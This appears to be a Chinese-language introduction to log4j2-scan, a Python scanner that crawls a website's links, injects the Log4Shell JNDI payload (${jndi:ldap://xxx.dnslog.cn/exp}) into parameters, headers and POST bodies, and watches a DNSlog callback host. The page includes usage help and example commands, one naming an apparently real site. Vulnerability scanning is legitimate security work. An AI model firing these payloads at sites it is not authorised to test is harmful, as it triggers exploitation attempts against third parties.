【log4j2-scan】使用浏览器爬虫获取网站全链接扫描log4j2漏洞工具
log4j2-scan
工具简介
log4j2-scan是一款利用浏览器爬虫爬取网站所有链接,并替换参数值为${jndi:ldap://xxx.dnslog.cn/exp}
形式,旨在遍历所有链接发现log4j2漏洞的工具。
工作流程
程序的工作流是利用rad爬取网站所有链接
自动适配操作系统下载rad程序
替换值为log4j2漏洞的payload
更改请求中refer、agent值为payload
更改GET型请求中'='号后的值为payload;
更改POST型请求中data数据包中'=''、':'(json格式)后的值为payload
将替换好的请求进行重放。
如未定义payload, 脚本将自动从dnglog获取并定义未
${jndi:ldap://xxx.dnslog.cn/exp}
如果是采用默认的dnslog为接收站点,那么将每重放十次检测一次dnslog。(考虑dnslog请求太多会被封禁)
如自定义接收站点,将不进行检测。
运行参数
需要注意的是,必须安装有chrome才可以运行,不支持firefox等。如chrome不是默认位置,须在rad_config.yml文件中指定chrome路径。
payload值默认自动从dnslog获取,但是因平台问题无法访问时,程序会提示错误。用户可以自定义其他站点或ip,如http://ceye.io/
_ _ _ _ ____ ____
| | ___ __ _| || | (_)___ \ / ___| ___ __ _ _ __ _ __ ___ _ __
| | / _ \ / _` | || |_| | __) |___\___ \ / __/ _` | '_ \| '_ \ / _ \ '__|
| |__| (_) | (_| |__ _| |/ __/_____|__) | (_| (_| | | | | | | | __/ |
|_____\___/ \__, | |_|_/ |_____| |____/ \___\__,_|_| |_|_| |_|\___|_|
|___/ |__/ by [email protected]. Illegal use is prohibited.
rad_windows_amd64.exe
usage: scan_with_rad.py [-h] [-u URL] [-f FILE] [-c CHROME_PATH] [-p PAYLOAD]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Check a single URL.
-f FILE, --file FILE file containing url.
-c CHROME_PATH Specify the chrome path.
-p PAYLOAD, --payload PAYLOAD
Specify the payload like ${jndi:ldap://xx}.
运行命令:
python scan_with_rad.py -u www.hao24.com
python scan_with_rad.py -p mh7av.ceye.io -u www.xxxx.com
工具地址
https://github.com/zongdeiqianxing/log4j2-scan